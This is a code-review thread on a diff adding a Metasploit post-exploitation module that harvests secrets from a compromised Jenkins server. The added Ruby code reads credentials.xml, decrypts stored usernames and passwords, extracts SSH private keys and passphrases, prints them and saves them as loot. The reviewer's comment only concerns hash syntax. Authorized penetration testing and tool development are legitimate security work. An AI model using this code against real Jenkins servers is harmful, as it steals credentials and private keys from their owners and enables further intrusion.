modules/post/multi/gather/jenkins_gather.rb

```diff
@@ -0,0 +1,433 @@
+    ))
+    register_options(
+      [  OptBool.new('STORE_LOOT', [false, 'Store files in loot (will simply output file to console if set to false).', true]),
+         OptBool.new('SEARCH_JOBS', [false, 'Search through job history logs for interesting keywords. Increases runtime.', false])
+      ])
+
+    @nodes = []
+    @creds = []
+    @ssh_keys = []
+    @api_tokens = []
+  end
+
+  def report_creds(user, pass)
+    return if user.empty? || pass.empty?
+      credential_data = {
+        origin_type: :session,
+        post_reference_name: self.fullname,
+        private_data: pass,
+        private_type: :password,
+        session_id: session_db_id,
+        username: user,
+        workspace_id: myworkspace_id
+      }
+
+      create_credential(credential_data)
+  end
+
+  def parse_credentialsxml(file)
+    vprint_status("Parsing credentials.xml...")
+    if exists?(file)
+      f = read_file(file)
+      if datastore['STORE_LOOT']
+        loot_path = store_loot('credentials.xml', 'text/plain', session, f)
+        vprint_status("File credentials.xml saved to #{loot_path}")
+      end
+    else
+      print_error("Could not read credentials.xml...")
+    end
+
+    xml_doc = Nokogiri::XML(f)
+    xml_doc.xpath("//com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl").each do |node|
+      username    = ""
+      password    = ""
+      description = ""
+      username = node.xpath("username").text
+      password = decrypt(node.xpath("password").text)
+      description = node.xpath("description").text
+      print_good("Credentials found - Username: #{username} Password: #{password}")
+      report_creds(username, password)
+      @creds << [username, password, description]
+    end
+
+    xml_doc.xpath("//com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey").each do |node|
+      cred_id     = ""
+      username    = ""
+      description = ""
+      passphrase  = ""
+      private_key = ""
+      cred_id = node.xpath("id").text
+      username = node.xpath("username").text
+      description = node.xpath("description").text
+      passphrase = node.xpath("passphrase").text.gsub("lneLKHOnEJRWJE7IKwLpAg==", "") # jenkins v1 empty passphrase
+      passphrase = decrypt(passphrase) unless passphrase == "lneLKHOnEJRWJE7IKwLpAg=="
+      private_key = node.xpath("//privateKeySource//privateKey").text
+      private_key = decrypt(private_key) unless private_key.match?(/----BEGIN/)
+      print_good("SSH Key found! ID: #{cred_id} Passphrase: #{passphrase || '<empty>' } Username: #{username} Description: #{description}")
+
+      store_loot("ssh-#{cred_id}", 'text/plain', session, private_key, nil, nil) if datastore['STORE_LOOT']
+      @ssh_keys << [cred_id, description, passphrase, username, private_key]
+
+      begin
+        k = OpenSSL::PKey::RSA.new(private_key, passphrase)
+        key = SSHKey.new(k, :passphrase => passphrase, :comment => cred_id)
```

Comment:
Do please use the new ruby hash syntax:
key = SSHKey.new(k, passphrase: passphrase, comment: cred_id)